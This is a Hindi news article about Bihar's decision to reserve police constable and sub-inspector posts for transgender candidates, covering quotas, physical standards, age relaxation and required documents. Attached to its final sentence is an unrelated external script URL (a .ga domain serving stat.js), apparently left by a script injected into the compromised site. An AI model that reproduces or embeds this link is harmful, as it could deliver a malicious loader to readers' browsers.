किन्नरों को भी मिलेगी समानता  –

 

 

बिहार,( कुलसूम फात्मा )   बिहार के मुख्यमंत्री ने किन्नर तथा ट्रांसजेंडर के लिए बड़ा निर्णय लिया है अब सामान्य लोगों की तरह किन्नर या ट्रांसजेंडर के पदों पर नियुक्त हो सकेगी। बिहार की सरकार ने अब सिपाही तथा अवर निरीक्षक के पदों पर किन्नर की सीधी नियुक्ति की जाए निर्देश दिए हैं   शुक्रवार को राज्य सरकार की स्वीकृत के पश्चात गृह विभाग ने भी इसमें जुड़ा Resolution letter. जारी कर दिया है।

 

 

 

ट्रांसजेंडर समुदाय को भी मिल सकेगी नौकरी

कॉन्स्टेबल संवर्ग के लिए सिलेक्श एसपी करेंगे और एसआई का डीआईजी लेवल के पदाधिकारी को अधिकार प्रदान किया जाएगा। सिपाही तथा पुलिस अवर निरीक्षक संवर्ग में हर एक 500 पद पर एक पद किन्नर समुदाय के लिए आरक्षित किया जाएगा। इस पद के लिए भिन्न-भिन्न विज्ञापन भी प्रकाशित किए जाएंगे। यदि किन्नर के लिए आरक्षित पदों पर नियुक्त के क्रम में सिलेक्टेड अभ्यार्थी कम पड़ जाते हैं तो आरक्षित शेष रिक्तियों को उसी मूल विज्ञापन के सामान्य अभ्यर्थियों से भरने की कार्यवाही की जाएगी।

 

 

 

किन्नरों की नियुक्ति पुलिस मैन 1978 के सिपाही तथा पुलिस अवर निरीक्षक संवर्ग के अनुसार होगी और जो ट्रांसजेंटर अभ्यार्थी हैं उनके लिए शारीरिक मापदंड तथा फिजिकल एफिशिएंसी एग्जाम का मापदंड से संबंधित संवर्ग महिला अभ्यर्थी के समान रखा जाएगा।  और यदि हम इन अभ्यर्थियों की उम्र की बात करें तो उम्र विज्ञापन के अनुसार होगी तथा अधिकतम उम्र अनुसूचित जाति तथा अनुसूचित जनजाति कोटेे के समान छूट दी जाएगी।

 

 

 

जाने क्या क्या देना होगा दस्तावेज –

इन अभ्यर्थियों को बिहार राज्य का मूल निवासी होने का प्रमाण पत्र तथा राज्य सरकार के जरिए निर्धारित सक्षम पदाधिकारी से निर्गत हुआ ट्रांसजेंडर होने का प्रमाण पत्र देना होगा और नियुक्त के लिए विज्ञापन का प्रकाशन तथा   सिलेक्शन का प्रोसेस ,सिपाही वर्ग के लिए केंद्रीय चयन परिषद तथा पुलिस अवर निरीक्षक के लिए पुलिस अवर सेवा आयोग के जरिए पूरा किया जाएगा।https://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.